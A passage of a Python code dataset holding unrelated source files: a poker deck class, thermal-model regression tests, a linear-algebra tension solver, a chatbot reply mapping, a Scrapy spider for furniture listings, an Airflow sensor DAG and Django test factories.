\n def generateTurnOrRiver(self):\n a = random.sample(self.cardsInDeck, 1)\n self.cardsInDeck.remove(a[0])\n self.board.append(a[0])\n return self.board\n \n def generateCompleteBoard(self):\n self.generateFlop()\n self.generateTurnOrRiver()\n self.generateTurnOrRiver()\n return self.board\n \n def createCardFilter(self):\n counter = 0\n for i in range(14,1,-1):\n self.cardsMatrix.append([])\n for j in range(14,1,-1):\n if i == j:\n self.cardsMatrix[counter].append(self.handValue.get(i) + self.handValue.get(j))\n elif j < i:\n self.cardsMatrix[counter].append(self.handValue.get(i) + self.handValue.get(j) + \"s\")\n elif j > i:\n self.cardsMatrix[counter].append(self.handValue.get(j) + self.handValue.get(i) + \"o\")\n counter += 1\n return self.cardsMatrix\n \n def printCardsMatrix(self):\n for i in range(13):\n for j in range(13):\n print(str(self.cardsMatrix[i][j]) + \" \", end =' ')\n print(\"\")\n \n def selectCards(self, cards):\n result = []\n if cards[0] == cards[1]:\n result.append(cards[0]+\"c\"+cards[0]+\"d\")\n result.append(cards[0]+\"c\"+cards[0]+\"h\")\n result.append(cards[0]+\"c\"+cards[0]+\"s\")\n result.append(cards[0]+\"d\"+cards[0]+\"h\")\n result.append(cards[0]+\"d\"+cards[0]+\"s\")\n result.append(cards[0]+\"h\"+cards[0]+\"s\")\n elif cards[2] == \"s\":\n result.append(cards[0]+\"c\"+cards[1]+\"c\")\n result.append(cards[0]+\"d\"+cards[1]+\"d\")\n result.append(cards[0]+\"h\"+cards[1]+\"h\")\n result.append(cards[0]+\"s\"+cards[1]+\"s\")\n elif cards[2] == \"o\":\n result.append(cards[0]+\"c\"+cards[1]+\"d\")\n result.append(cards[0]+\"c\"+cards[1]+\"h\")\n result.append(cards[0]+\"c\"+cards[1]+\"s\")\n result.append(cards[0]+\"d\"+cards[1]+\"h\")\n result.append(cards[0]+\"d\"+cards[1]+\"s\")\n result.append(cards[0]+\"h\"+cards[1]+\"s\")\n result.append(cards[0]+\"d\"+cards[1]+\"c\")\n result.append(cards[0]+\"h\"+cards[1]+\"c\")\n result.append(cards[0]+\"s\"+cards[1]+\"c\")\n result.append(cards[0]+\"h\"+cards[1]+\"d\")\n result.append(cards[0]+\"s\"+cards[1]+\"d\")\n result.append(cards[0]+\"s\"+cards[1]+\"h\")\n return result\n \n def selectRange(self, listOfCards):\n result = []\n for c in listOfCards:\n result = result + self.selectCards(c)\n return result\n \n \n def colorChange(self, t):\n #self.buttons[i][j].configure(bg = \"red\")\n counter = 0\n for e in self.buttons[t[0]]:\n if counter == t[1]:\n if e.cget('background')!=\"red\":\n e.configure(bg = \"red\")\n else:\n e.configure(bg = \"white\")\n counter += 1\n \n def CardsMatrixWindows(self):\n fenetre = Tk()\n counter = 0\n btnWidth = 6\n btnHeight = 3\n line = 0\n column = 0\n for i in range(14,1,-1):\n self.buttons.append([])\n for j in range(14,1,-1):\n if i == j:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(i) + self.handValue.get(j),bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n elif j < i:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(i) + self.handValue.get(j) + \"s\",bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n elif j > i:\n self.buttons[counter].append(Button(fenetre, text=self.handValue.get(j) + self.handValue.get(i) + \"o\",bg=\"white\", height=btnHeight, width=btnWidth, command=lambda arg1=(line,column):self.colorChange(arg1)))\n column += 1\n counter += 1\n column = 0\n line += 1\n for i in range(13):\n for j in range(13):\n self.buttons[i][j].grid(row=i, column=j)\n fenetre.mainloop()\n \n\nif(__name__ == \"__main__\"):\n card = CardDeck()\n card.printCardsMatrix()\n print(card.selectRange([\"AKo\",\"AA\",\"AKs\"]))\n \n ###########################################\n #Interface graphique\n ###########################################\n #card.CardsMatrixWindows()\n #card.buttons\n ","sub_path":"Poker project/cardDeck.py","file_name":"cardDeck.py","file_ext":"py","file_size_in_byte":5770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"496376255","text":"import os\nfrom numpy.testing import assert_array_equal, \\\n assert_allclose\nimport shutil\nimport tempfile\nimport pickle\nfrom pathlib import Path\n\nmonths = [\"JAN\", \"FEB\", \"MAR\", \"APR\", \"MAY\", \"JUN\",\n \"JUL\", \"AUG\", \"SEP\", \"OCT\", \"NOV\", \"DEC\"]\n\n# Loads for regression testing\ntest_loads = {\"normal\": [\"MAR0617A\", \"MAR2017E\", \"JUL3117B\", \"SEP0417A\"],\n \"interrupt\": [\"MAR1517B\", \"JUL2717A\", \"AUG2517C\", \"AUG3017A\",\n \"MAR0817B\", \"MAR1117A\", \"APR0217B\", \"SEP0917C\"]}\nall_loads = test_loads[\"normal\"]+test_loads[\"interrupt\"]\n\nnlets = {\"MAR0617A\", \"MAR0817B\", \"SEP0417A\"}\n\n\ndef get_lr_root():\n \"\"\"Get root directory for ACIS load review data.\n\n Try (in order):\n - /data/acis/LoadReviews\n - $SKA/data/acis/LoadReviews (for standalone installations)\n\n :returns: str, first path from above which exists.\n \"\"\"\n data_acis_lr = Path('data', 'acis', 'LoadReviews')\n path = '/' / data_acis_lr\n if not path.exists():\n path = os.environ['SKA'] / data_acis_lr\n if not path.exists():\n raise FileNotFoundError('no available ACIS load review directory')\n return str(path)\n\n\nclass TestArgs(object):\n \"\"\"\n A mock-up of a command-line parser object to be used with\n ACISThermalCheck testing.\n\n Parameters\n ----------\n name : string\n The \"short name\" of the temperature to be modeled.\n outdir : string\n The path to the output directory.\n model_path : string\n The path to the model code itself.\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n load_week : string, optional\n The load week to be tested, in a format like \"MAY2016\". If not\n provided, it is assumed that a full set of initial states will\n be supplied.\n days : float, optional\n The number of days to run the model for. Default: 21.0\n T_init : float, optional\n The starting temperature for the run. If not set, it will be\n determined from telemetry.\n interrupt : boolean, optional\n Whether or not this is an interrupt load. Default: False\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n verbose : integer, optional\n The verbosity of the output. Default: 0\n model_spec : string, optional\n The path to the model specification file to use. Default is to\n use the model specification file stored in the model package.\n nlet_file : string, optional\n The path to an alternative NLET file to be used. Default: None,\n which is to use the default one. \n \"\"\"\n def __init__(self, name, outdir, model_path, run_start=None,\n load_week=None, days=21.0, T_init=None, interrupt=False,\n state_builder='acis', verbose=0, model_spec=None,\n nlet_file=None):\n from datetime import datetime\n self.load_week = load_week\n if run_start is None:\n year = 2000 + int(load_week[5:7])\n month = months.index(load_week[:3])+1\n day = int(load_week[3:5])\n run_start = datetime(year, month, day).strftime(\"%Y:%j:%H:%M:%S\")\n self.run_start = run_start\n self.outdir = outdir\n lr_root = get_lr_root() # Directory containing ACIS load review data\n # load_week sets the bsdir\n if load_week is None:\n self.backstop_file = None\n else:\n load_year = \"20%s\" % load_week[-3:-1]\n load_letter = load_week[-1].lower()\n self.backstop_file = \"%s/%s/%s/ofls%s\" % (lr_root, load_year, load_week[:-1], load_letter)\n self.days = days\n if nlet_file is None:\n nlet_file = f'{lr_root}/NonLoadTrackedEvents.txt'\n self.nlet_file = nlet_file\n self.interrupt = interrupt\n self.state_builder = state_builder\n self.pred_only = False\n self.T_init = T_init\n self.traceback = True\n self.verbose = verbose\n if model_spec is None:\n model_spec = os.path.join(model_path, \"%s_model_spec.json\" % name)\n self.model_spec = model_spec\n self.version = None\n if name == \"acisfp\":\n self.fps_nopref = os.path.join(model_path, \"FPS_NoPref.txt\")\n\n\ndef exception_catcher(test, old, new, data_type, **kwargs):\n if new.dtype.kind == \"S\":\n new = new.astype(\"U\")\n if old.dtype.kind == \"S\":\n old = old.astype(\"U\")\n try:\n test(old, new, **kwargs)\n except AssertionError:\n raise AssertionError(\"%s are not the same!\" % data_type)\n\n\nclass RegressionTester(object):\n def __init__(self, atc_class, model_path, model_spec, atc_args=None,\n atc_kwargs=None, test_root=None, sub_dir=None):\n self.model_path = model_path\n if atc_args is None:\n atc_args = ()\n if atc_kwargs is None:\n atc_kwargs = {}\n self.atc_obj = atc_class(*atc_args, **atc_kwargs)\n self.msid = self.atc_obj.msid\n self.name = self.atc_obj.name\n self.valid_limits = self.atc_obj.validation_limits\n self.hist_limit = self.atc_obj.hist_limit\n self.curdir = os.getcwd()\n if test_root is None:\n rootdir = tempfile.mkdtemp()\n else:\n rootdir = test_root\n if sub_dir is not None:\n rootdir = os.path.join(rootdir, sub_dir)\n self.outdir = os.path.abspath(rootdir)\n self.test_model_spec = os.path.join(model_path, \"tests\", model_spec)\n if not os.path.exists(self.outdir):\n os.makedirs(self.outdir, exist_ok=True)\n\n def run_model(self, load_week, run_start=None, state_builder='acis',\n interrupt=False, override_limits=None):\n \"\"\"\n Run a thermal model in test mode for a single load week.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n interrupt : boolean, optional\n Whether or not this is an interrupt load. Default: False\n override_limits : dict, optional\n Override any margin by setting a new value to its name\n in this dictionary. SHOULD ONLY BE USED FOR TESTING.\n \"\"\"\n out_dir = os.path.join(self.outdir, load_week)\n if load_week in nlets:\n nlet_file = os.path.join(os.path.dirname(__file__), \n f'data/nlets/TEST_NLET_{load_week}.txt')\n else:\n nlet_file = None\n args = TestArgs(self.name, out_dir, self.model_path, run_start=run_start,\n load_week=load_week, interrupt=interrupt, nlet_file=nlet_file,\n state_builder=state_builder, model_spec=self.test_model_spec)\n self.atc_obj.run(args, override_limits=override_limits)\n\n def run_models(self, normal=True, interrupt=True, run_start=None,\n state_builder='acis'):\n \"\"\"\n Run the internally set list of models for regression testing.\n\n Parameters\n ----------\n normal : boolean, optional\n Run the \"normal\" loads. Default: True\n interrupt : boolean, optional\n Run the \"interrupt\" loads. Default: True\n run_start : string, optional\n The run start time in YYYY:DOY:HH:MM:SS.SSS format. If not\n specified, one will be created 3 days prior to the model run.\n state_builder : string, optional\n The mode used to create the list of commanded states. \"sql\" or\n \"acis\", default \"acis\".\n \"\"\"\n if normal:\n for load in test_loads[\"normal\"]:\n self.run_model(load, run_start=run_start,\n state_builder=state_builder)\n if interrupt:\n for load in test_loads[\"interrupt\"]:\n self.run_model(load, interrupt=True, run_start=run_start,\n state_builder=state_builder)\n\n def _set_answer_dir(self, load_week):\n answer_dir = os.path.join(self.model_path, \"tests/answers\",\n load_week)\n if not os.path.exists(answer_dir):\n os.makedirs(answer_dir)\n return answer_dir\n\n def run_test(self, test_name, load_week, answer_store=False):\n \"\"\"\n This method runs the answer test in one of two modes:\n either comparing the answers from this test to the \"gold\n standard\" answers or to simply run the model to generate answers.\n\n Parameters\n ----------\n test_name : string\n The name of the test to run. \"prediction\" or \"validation\".\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n answer_store : boolean, optional\n If True, store the generated data as the new answers.\n If False, only test. Default: False\n \"\"\"\n out_dir = os.path.join(self.outdir, load_week)\n if test_name == \"prediction\":\n filenames = [\"temperatures.dat\", \"states.dat\"]\n if self.name == \"acisfp\":\n filenames.append(\"earth_solid_angles.dat\")\n elif test_name == \"validation\":\n filenames = [\"validation_data.pkl\"]\n else:\n raise RuntimeError(\"Invalid test specification! \"\n \"Test name = %s.\" % test_name)\n if not answer_store:\n compare_test = getattr(self, \"compare_\"+test_name)\n compare_test(load_week, out_dir, filenames)\n else:\n answer_dir = self._set_answer_dir(load_week)\n self.copy_new_files(out_dir, answer_dir, filenames)\n\n def compare_validation(self, load_week, out_dir, filenames):\n \"\"\"\n This method compares the \"gold standard\" validation data \n with the current test run's data.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n out_dir : string\n The path to the output directory.\n filenames : list of strings\n The list of files which will be used in the comparison.\n Currently only \"validation_data.pkl\".\n \"\"\"\n # First load the answers from the pickle files, both gold standard\n # and current\n new_answer_file = os.path.join(out_dir, filenames[0])\n new_results = pickle.load(open(new_answer_file, \"rb\"))\n old_answer_file = os.path.join(self.model_path, \"tests/answers\", load_week,\n filenames[0])\n old_results = pickle.load(open(old_answer_file, \"rb\"))\n # Compare predictions\n new_pred = new_results[\"pred\"]\n old_pred = old_results[\"pred\"]\n pred_keys = set(new_pred.keys()) | set(old_pred.keys())\n for k in pred_keys:\n if k not in new_pred:\n print(\"WARNING in pred: '%s' in old answer but not new. Answers should be updated.\" % k)\n continue\n if k not in old_pred:\n print(\"WARNING in pred: '%s' in new answer but not old. Answers should be updated.\" % k)\n continue\n exception_catcher(assert_allclose, new_pred[k], old_pred[k],\n \"Validation model arrays for %s\" % k, rtol=1.0e-5)\n # Compare telemetry\n new_tlm = new_results['tlm']\n old_tlm = old_results['tlm']\n tlm_keys = set(new_tlm.dtype.names) | set(old_tlm.dtype.names)\n for k in tlm_keys:\n if k not in new_tlm.dtype.names:\n print(\"WARNING in tlm: '%s' in old answer but not new. Answers should be updated.\" % k)\n continue\n if k not in old_tlm.dtype.names:\n print(\"WARNING in tlm: '%s' in new answer but not old. Answers should be updated.\" % k)\n continue\n exception_catcher(assert_array_equal, new_tlm[k], old_tlm[k],\n \"Validation telemetry arrays for %s\" % k)\n\n def compare_prediction(self, load_week, out_dir, filenames):\n \"\"\"\n This method compares the \"gold standard\" prediction data with \n the current test run's data for the .dat files produced in the \n thermal model run.\n\n Parameters\n ----------\n load_week : string\n The load week to be tested, in a format like \"MAY2016A\".\n out_dir : string\n The path to the output directory.\n filenames : list of strings\n The list of files which will be used in the comparison.\n \"\"\"\n from astropy.io import ascii\n for fn in filenames:\n new_fn = os.path.join(out_dir, fn)\n old_fn = os.path.join(self.model_path, \"tests/answers\", load_week, fn)\n new_data = ascii.read(new_fn).as_array()\n old_data = ascii.read(old_fn).as_array()\n # Compare test run data to gold standard. Since we're loading from\n # ASCII text files here, floating-point comparisons will be different\n # at machine precision, others will be exact.\n for k, dt in new_data.dtype.descr:\n if 'f' in dt:\n exception_catcher(assert_allclose, new_data[k], old_data[k],\n \"Prediction arrays for %s\" % k, rtol=1.0e-5)\n else:\n exception_catcher(assert_array_equal, new_data[k], old_data[k],\n \"Prediction arrays for %s\" % k)\n \n def copy_new_files(self, out_dir, answer_dir, filenames):\n \"\"\"\n This method copies the files generated in this test\n run to a directory specified by the user, typically for\n inspection and for possible updating of the \"gold standard\"\n answers.\n\n Parameters\n ----------\n out_dir : string\n The path to the output directory.\n answer_dir : string\n The path to the directory to which to copy the files.\n filenames : list of strings\n The filenames to be copied.\n \"\"\"\n for filename in filenames:\n fromfile = os.path.join(out_dir, filename)\n tofile = os.path.join(answer_dir, filename)\n shutil.copyfile(fromfile, tofile)\n\n def check_violation_reporting(self, load_week, viol_json, \n answer_store=False):\n \"\"\"\n This method runs loads which report violations of\n limits and ensures that they report the violation,\n as well as the correct start and stop times.\n\n Parameters\n ----------\n load_week : string\n The load to check. \n model_spec : string\n The path to the model specification file to\n use. For this test, to ensure the violation is\n reported in the same way, we must use the same\n model specification file that was used at the\n time of the run.\n viol_json : string\n Path to the JSON file containing the answers\n for the violation data.\n answer_store : boolean, optional\n If True, store the generated data as the new answers.\n If False, only test. Default: False\n \"\"\"\n import json\n with open(viol_json, \"r\") as f:\n viol_data = json.load(f)\n if answer_store:\n viol_data[\"datestarts\"] = []\n viol_data[\"datestops\"] = []\n viol_data[\"duration\"] = []\n viol_data[\"temps\"] = []\n if self.msid == \"fptemp\":\n viol_data[\"obsids\"] = []\n load_year = \"20%s\" % load_week[-3:-1]\n next_year = f\"{int(load_year)+1}\"\n self.run_model(load_week, run_start=viol_data['run_start'], \n override_limits=viol_data['limits'])\n out_dir = os.path.join(self.outdir, load_week)\n index_rst = os.path.join(out_dir, \"index.rst\")\n with open(index_rst, 'r') as myfile:\n i = 0\n for line in myfile.readlines():\n if line.startswith(\"Model status\"):\n assert \"NOT OK\" in line\n if line.startswith(load_year) or line.startswith(next_year):\n if answer_store:\n words = line.strip().split()\n viol_data[\"datestarts\"].append(words[0])\n viol_data[\"datestops\"].append(words[1])\n viol_data[\"duration\"].append(words[2])\n viol_data[\"temps\"].append(words[3])\n if self.msid == \"fptemp\":\n viol_data[\"obsids\"].append(words[4])\n else:\n try:\n assert viol_data[\"datestarts\"][i] in line\n assert viol_data[\"datestops\"][i] in line\n assert viol_data[\"duration\"][i] in line\n assert viol_data[\"temps\"][i] in line\n if self.msid == \"fptemp\":\n assert viol_data[\"obsids\"][i] in line\n except AssertionError:\n raise AssertionError(\"Comparison failed. Check file at \"\n \"%s.\" % index_rst)\n i += 1\n if answer_store:\n with open(viol_json, \"w\") as f:\n json.dump(viol_data, f, indent=4)\n\n","sub_path":"acis_thermal_check/regression_testing.py","file_name":"regression_testing.py","file_ext":"py","file_size_in_byte":17968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"475093198","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 20:32:52 2019\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport scipy.linalg as sp\nimport matplotlib.pyplot as plt\n\n\n\ndef LU_lin_solver(A,b):\n '''Calculates the soultion to a linear equation using LU decomposition.'''\n lu,piv=sp.lu_factor(A)\n \n return sp.lu_solve((lu,piv),b)\n\n\ndef Minor(A,i,j):\n '''calculates the matrix of minors for a NxN matrix, A, around some matrix element i,j.'''\n #For calculating the matrix of cofactors and for calculating the determinate of a N>2 matrix\n #I will need to be able to calculate a matrix of minors\n N=A.shape[0]\n minor=np.zeros((N-1,N-1))\n cork=0\n #As we move past k=i I need to correct the k values using cork.\n #This is so that elements in the NxN matrix will corrospond to a position in the minor matrix.\n for k in range(N):\n if k==i:\n cork=1\n else:\n corh=0\n for h in range(N):\n if h==j:\n corh=1\n else:\n minor[k-cork][h-corh]=A[k][h]\n \n return minor\n\n\ndef Det(A):\n '''Calculates the determinant of an NxN matrix, A.'''\n N=A.shape[0]\n #Only going to use square matrices so should just be able to take first element\n if N==2:\n return A[0,0]*A[1,1]-A[0,1]*A[1,0]\n \n elif N>2:\n #For n>2 we need to create a matrix of minors.\n #The code will have to keep looping until the NxN matrix is reduced to a series of 2x2 matrices.\n det=0\n for i in range(N):\n det+=((-1)**i)*A[0][i]*Det(Minor(A,0,i))\n \n \n return det \n\ndef Cofactors(A,Transpose=True):\n '''Returns the Transpose of the cofactors for a NxN matrix, A, if \n Transpose=True. If Trasnpose=False then the function will return the matrix of cofactors'''\n N=A.shape[0]\n cofactors=np.zeros((N,N))\n #When calculating the determinate we want the inverse of the cofactors.\n #So unless specified otherwise this function will return the inverse of the cofactors \n for i in range(N):\n for j in range(N):\n cofactors[i][j]= ((-1)**(i+j))*Det(Minor(A,i,j))\n \n if Transpose==True:\n transpose=np.zeros((N,N))\n for k in range(N):\n for l in range(N):\n transpose[l,k]=cofactors[k,l]\n return transpose \n \n else:\n return cofactors \n\ndef Invert(A):\n '''Calculates the inverse of a matrix A.'''\n N=A.shape[0]\n if N==2:\n invert=(1/Det(A))*np.array([[A[1,1],-A[0,1]],[-A[1,0],A[0,0]]])\n \n else:\n invert=(1/Det(A))*Cofactors(A,True)\n \n return invert\n\ndef Matrix_multiplication(A,B):\n '''Multiples two matrices A and B together. Matrices do not commute so make \\n\n sure the order of the matrices are correct.'''\n AShape=A.shape\n BShape=B.shape\n Product=np.zeros((AShape[0],BShape[1]))\n #When muliplying two matrixs mxn and nxp the new matrix that is formed is given by mxp \n for i in range(AShape[0]):\n for j in range(BShape[0]):\n for k in range(len(B)):\n Product[i][j]+=A[i][k]*B[k][j]\n \n return Product\n \ndef Max_error(inv,A):\n '''Finds the error of a function that calculates the inverse of a matrix.'''\n '''The argument inv is the function I want to test and A is the matrix I am''' \n '''using to test the function. This function calculates the inverse of a matrix'''\n '''then it mulitples the matrix by the inverse the product should be equal to the''' \n '''identity matrix. This function calculates the difference between the product and''' \n '''the identity and takes the largest element as the error'''\n \n N=A.shape[0]\n Identity=np.identity(N)\n B=inv(A)\n ide=Matrix_multiplication(A,B)\n diff=ide-Identity\n return np.max(abs(diff))\n\ndef Lin_solver(A,b):\n '''Calculates the soultion to a linear equation using Cramer's rule.'''\n return np.dot(Invert(A),b)\n\ndef SVD_lin_solver(A,b):\n '''This function uses SVD decomposition to calculate the soultion to a linear equation.'''\n #Decomposes A into U,Sigma,VT where U and VT are orthogonal and sigma is the singularity matrix. \n U,Sigma,VT=np.linalg.svd(A)\n UT=np.transpose(U)\n w=np.dot(UT,b)\n #np.linalg.svd returns sigma as a vector so need to diagonilise it\n S=np.diag(Sigma)\n c=np.linalg.solve(S,w)\n V=np.transpose(VT)\n x=np.dot(V,c)\n \n return x\n\n\n\nb=np.array([0,70*9.81])\n\nT1=[]\nT2=[]\nList1=[]\nList2=[]\n\nfor y in np.linspace(0,7,100):\n for x in np.linspace(0,15,100):\n \n cos1=x/np.sqrt((x**2)+((8-y)**2))\n sin1=(8-y)/np.sqrt((x**2)+((8-y)**2))\n \n cos2=(15-x)/np.sqrt(((15-x)**2)+((8-y)**2))\n sin2=(8-y)/np.sqrt(((15-x)**2)+((8-y)**2))\n \n Matrix_coefficents=np.array([[cos1,-cos2],[sin1,sin2]])\n \n Tension2d=SVD_lin_solver(Matrix_coefficents,b)\n \n List1.append(Tension2d[0])\n List2.append(Tension2d[1])\n \n T1.append(List1)\n T2.append(List2)\n List1=[]\n List2=[]\n \n \nplt.title('Tension in wire 1') \nplt.imshow(T1,origin='lower',extent=[0,15,0,7])\nplt.colorbar(label='Tension (N)')\nplt.xlabel('X position (m)')\nplt.ylabel('Y position (m)')\nplt.show()\nplt.clf()\n\nplt.title('Tension in wire 2')\nplt.imshow(T2,origin='lower',extent=[0,15,0,7])\nplt.colorbar(label='Tension(N)')\nplt.xlabel('X position (m)')\nplt.ylabel('Y position (m)')\nplt.show()\nplt.clf()","sub_path":"Task 3 A.py","file_name":"Task 3 A.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621015276","text":"from app.common_reply import get_reply_from_mapping_function\nfrom app.rabbit import my_rabbit, adopt_rabbit\n\n\npattern_mapping_private = [\n {\n 'cmd': '我的兔子',\n 'type': 'equal',\n 'function': my_rabbit,\n 'multi_type_output': True\n },\n {\n 'cmd': '領養兔子',\n 'type': 'equal',\n 'function': adopt_rabbit,\n 'multi_type_output': True\n },\n]\n\n\ndef private_reply(msg_info, robot_settings):\n reply = get_reply_from_mapping_function(msg_info, robot_settings, pattern_mapping_private)\n if reply:\n return reply\n","sub_path":"app/private_reply.py","file_name":"private_reply.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364706575","text":"import scrapy\nimport re\nimport os\nimport requests\nimport json\n\n# USER_AGENT = 'Chrome/77.0.3865.90' in settings.py\n\nclass pepperfrySpider(scrapy.Spider):\n name = \"pepperfrySpider\"\n BASE_DIR = \"./Pepperfry_data/\"\n MAX_CNT = 20\n\n def start_requests(self):\n # base url of the website\n BASE_URL = \"https://www.pepperfry.com/site_product/search?q=\"\n\n # used to search a specific item\n items = [\"book cases\", \"bean bags\"]\n\n urls = []\n dir_names = []\n\n for item in items:\n query_string = '+'.join(item.split(' '))\n dir_name = '-'.join(item.split(' '))\n dir_names.append(dir_name)\n urls.append(BASE_URL + query_string)\n # store directory names and urls the items\n\n dir_path = self.BASE_DIR + dir_name\n # name the directory\n\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n # if the directory does not exist, then create it\n \n\n #print(self.urls)\n # traverse all the urls\n for i in range(len(urls)):\n d = {\n \"dir_name\": dir_names[i]\n }\n # d gets the directory where current url things need to be saved\n\n resp = scrapy.Request(url = urls[i], callback = self.parse, dont_filter = True)\n resp.meta['dir_name'] = dir_names[i]\n yield resp\n \n def parse(self, response, **meta):\n product_urls = response.xpath('//div/div/div/h2/a/@href').extract()\n # get the url of the specific item of the product searched above\n\n counter = 0\n\n #print(product_urls)\n\n for url in product_urls:\n resp = scrapy.Request(url = url.split('?', 1)[0], callback = self.parse_item, dont_filter = True)\n resp.meta['dir_name'] = response.meta['dir_name']\n\n if counter == self.MAX_CNT:\n break\n\n if not resp == None:\n counter += 1\n\n yield resp\n\n def parse_item(self, response, **meta):\n item_title = response.xpath('//div/div/div/h1/text()').extract()[0]\n item_price = response.xpath('//div/div/div/span[@class=\"vip-our-price-amt font-18 pf-text-dark-grey pf-bold-txt\"]/text()').extract()[0].strip()\n\n item_brand = response.xpath('//span[@itemprop=\"brand\"]/text()').extract()\n\n d = {\n 'Item title': item_title,\n 'Item price': item_price,\n 'Item brand': item_brand\n }\n\n img_url_list = response.xpath('//li[@class=\"vip-options-slideeach\"]/a/@data-img').extract()\n\n\n # create another directory for a particular type of searched product\n CATEGORY_NAME = response.meta['dir_name']\n ITEM_DIR_URL = os.path.join(self.BASE_DIR, os.path.join(CATEGORY_NAME, item_title))\n\n\n if not os.path.exists(ITEM_DIR_URL):\n os.makedirs(ITEM_DIR_URL)\n\n # save directory in json format as metadata.txt\n with open(os.path.join(ITEM_DIR_URL, 'metadata.txt'), \"w\") as f:\n json.dump(d, f)\n\n # travel all the image urls and save the images as jpg\n for i, img_url in enumerate(img_url_list):\n if i == 2:\n break\n \n r = requests.get(img_url)\n\n with open(os.path.join(ITEM_DIR_URL, 'image_{}.jpg'.format(i)), 'wb') as f:\n f.write(r.content)\n\n \n yield d","sub_path":"pepperfry/pepperfry/spiders/my_spider.py","file_name":"my_spider.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"293839532","text":"from datetime import timedelta\r\nimport os\r\n\r\nfrom airflow import DAG\r\nfrom airflow.operators.bash import BashOperator\r\nfrom airflow.sensors.python import PythonSensor\r\n\r\nfrom airflow.utils.dates import days_ago\r\n\r\n\r\ndefault_args = {\r\n \"owner\": \"airflow\",\r\n \"depends_on_past\": False,\r\n \"start_date\": days_ago(2),\r\n \"retries\": 1,\r\n \"retry_delay\": timedelta(minutes=5),\r\n}\r\n\r\n\r\ndef _data_ready_for_train():\r\n return os.path.exists(\"/opt/airflow/data/processed/{{ ds }}/data.csv\")\r\n\r\n\r\ndef _data_ready_for_predict():\r\n return os.path.exists(\"/opt/airflow/data/raw/{{ ds }}/data.csv\")\r\n\r\n\r\nwith DAG(\r\n \"data_ready_sensor\",\r\n default_args=default_args,\r\n description=\"This DAG checks that data is ready\",\r\n schedule_interval=timedelta(days=1),\r\n) as dag:\r\n wait_data_ready_for_train = PythonSensor(\r\n task_id=\"data_ready_for_train\",\r\n python_callable=_data_ready_for_train,\r\n timeout=6000,\r\n poke_interval=10,\r\n retries=100,\r\n mode=\"poke\",\r\n )\r\n\r\n wait_data_ready_for_predict = PythonSensor(\r\n task_id=\"data_ready_for_predict\",\r\n python_callable=_data_ready_for_predict,\r\n timeout=6000,\r\n poke_interval=10,\r\n retries=100,\r\n mode=\"poke\",\r\n )\r\n\r\n t = BashOperator(\r\n task_id=\"touch_file\",\r\n bash_command=\"touch /opt/airflow/data/ready.txt\",\r\n )\r\n\r\n wait_data_ready_for_train >> wait_data_ready_for_predict >> t","sub_path":"airflow_ml_dags/dags/data_ready_sensor.py","file_name":"data_ready_sensor.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642255522","text":"# encoding: utf-8\n\"\"\"Rope element sample data factories.\"\"\"\nimport importlib\nimport json\nimport os\n\nimport factory\n\nfrom . import models\n\nfixtures_dir = os.path.join(os.path.dirname(\n importlib.import_module('ropeelements').__file__), 'fixtures')\n\n\ndef load(name):\n with open(os.path.join(fixtures_dir, name + '.json'), 'r') as fd:\n return json.loads(fd.read())\n\n\nclass ConfigFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Config\n\n\ndef create_config():\n [ConfigFactory.create(**data) for data in load('config')]\n\n\nclass DifficultyFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Difficulty\n\n\ndef create_difficulties():\n [DifficultyFactory.create(**data) for data in load('difficulties')]\n\n\nclass KindFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Kind\n\n title_en = 'Seilrutschen'\n title_de = 'Zip Lines & Downward'\n\n\ndef create_kinds():\n [KindFactory.create(**data) for data in load('kinds')]\n\n\ndef find_or_create_kind(title_en):\n try:\n return models.Kind.objects.get(title_en=title_en)\n except models.Kind.DoesNotExist:\n return KindFactory.create(title_en=title_en)\n\n\ndef image_path(filename):\n return os.path.normpath(os.path.join(fixtures_dir, 'images', filename))\n\n\nclass ElementFactory(factory.django.DjangoModelFactory):\n class Meta:\n model = models.Element\n\n image = factory.django.ImageField()\n thumbnail = factory.django.ImageField()\n\n\ndef create_element(**data):\n data['kind'] = find_or_create_kind(data.pop('kind_en'))\n if 'image' in data:\n data['image__from_path'] = image_path(data['image'])\n del data['image']\n else:\n data['image'] = None\n if 'thumbnail' in data:\n data['thumbnail__from_path'] = image_path(data['thumbnail'])\n del data['thumbnail']\n else:\n data['thumbnail'] = None\n\n ElementFactory.create(**data)\n\n\ndef create_elements():\n [create_element(**data) for data in 